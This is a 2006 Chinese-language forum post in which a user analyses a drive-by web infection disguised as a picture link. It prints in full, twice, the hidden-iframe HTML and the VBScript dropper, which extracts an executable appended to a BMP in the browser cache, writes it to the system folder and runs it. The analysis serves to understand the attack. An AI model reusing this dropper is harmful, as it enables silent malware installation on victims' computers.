史萊姆論壇 - 查看單個文章

psac · 2006-03-06, 06:55 PM

某網頁病毒淺析
某日，一QQ好友給我發訊息，說正在看一幅畫，還強調沒病毒，我想把連接框起來，用網路快車下載下來看，沒想到一下子點進去了，防火牆蹦出來，問要不要讓mshta.exe訪問網路，我知道中毒了，直接禁止他，然後用網路快車下載該jpg文件看，原來是html+javascript,找到如下可疑內容：

<img src="/images/girl.jpg" width="600" height="800">
顯示jpg圖像，讓人以為此奶一MM圖片

<IMG SRC=klook.bmp width=0 height=0>
<object data="klook.ASP" width=0 height=0>
klook.bmp和klook.ASP保證有問題

於是下載klook.bmp看，確實是bmp圖，但都是亂七八糟的色塊，於是用UltraEdit開啟看，文件頭是BMP沒錯，殼居然發現"MZ"和"PE"字樣！我明白了，他把EXE文件貼上再BMP文件頭的後面！

再下載klook.asp，內容如下：
<title>-</title>

<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\快取")
sucess=0

SearchBMPFile fso.GetFolder(CACHE),"klook[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"klook[2].bmp"

Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname');
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
Lt.WriteLine("2200")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("%40echo off")
Lt.WriteLine(chr(100) & "ebug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "klook.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "klook.exe")
Lt.WriteLine("del %0")
Lt.Close
sucess=1
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next

end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
window.close
</script>

<SCRIPT language=JavaScript>
parent.moveTo(0,0);
parent.resizeTo(0,0);
</SCRIPT>

大概是這樣的：
先新增Scripting.FileSystemObject對像和WScript.Shell對象，讀取IE臨時文件所在地，然後搜尋下載的klook.bmp文件，再把klook.bmp尾部附加的exe文件放出來執行。

下次把那個exe文件切下來反彙編一下

2006-03-06, 06:55 PM	#6 (permalink)
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	某網頁病毒淺析某日，一QQ好友給我發訊息，說正在看一幅畫，還強調沒病毒，我想把連接框起來，用網路快車下載下來看，沒想到一下子點進去了，防火牆蹦出來，問要不要讓mshta.exe訪問網路，我知道中毒了，直接禁止他，然後用網路快車下載該jpg文件看，原來是html+javascript,找到如下可疑內容： <img src="/images/girl.jpg" width="600" height="800"> 顯示jpg圖像，讓人以為此奶一MM圖片 <IMG SRC=klook.bmp width=0 height=0> <object data="klook.ASP" width=0 height=0> klook.bmp和klook.ASP保證有問題於是下載klook.bmp看，確實是bmp圖，但都是亂七八糟的色塊，於是用UltraEdit開啟看，文件頭是BMP沒錯，殼居然發現"MZ"和"PE"字樣！我明白了，他把EXE文件貼上再BMP文件頭的後面！再下載klook.asp，內容如下： <title>-</title> <SCRIPT LANGUAGE="VBScript"> Option Explicit Dim FSO,WSH,CACHE,str,sucess Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\快取") sucess=0 SearchBMPFile fso.GetFolder(CACHE),"klook[1].bmp" if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"klook[2].bmp" Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname'); if FSO.FileExists(str) then tmp=fso.GetSpecialFolder(2) & "\" winsys=fso.GetSpecialFolder(1) & "\" set File=FSO.GetFile(str) File.Copy(tmp & "tmp.dat") On Error Resume Next File.Delete if FSO.FileExists(str) then exit function set Lt=FSO.CreateTextFile(tmp & "tmp.in") Lt.WriteLine("rbx") Lt.WriteLine("0") Lt.WriteLine("rcx") Lt.WriteLine("2200") Lt.WriteLine("w136") Lt.WriteLine("q") Lt.Close set Lt=FSO.CreateTextFile(tmp & "tmp.bat") Lt.WriteLine("%40echo off") Lt.WriteLine(chr(100) & "ebug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "klook.exe>" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine(winsys & "klook.exe") Lt.WriteLine("del %0") Lt.Close sucess=1 WSH.Run tmp & "tmp.bat",false,6 On Error Resume Next end if If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchBMPFile SubFolder,fname Next End If End Function window.close </script> <SCRIPT language=JavaScript> parent.moveTo(0,0); parent.resizeTo(0,0); </SCRIPT> 大概是這樣的：先新增Scripting.FileSystemObject對像和WScript.Shell對象，讀取IE臨時文件所在地，然後搜尋下載的klook.bmp文件，再把klook.bmp尾部附加的exe文件放出來執行。下次把那個exe文件切下來反彙編一下
	__________________
	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次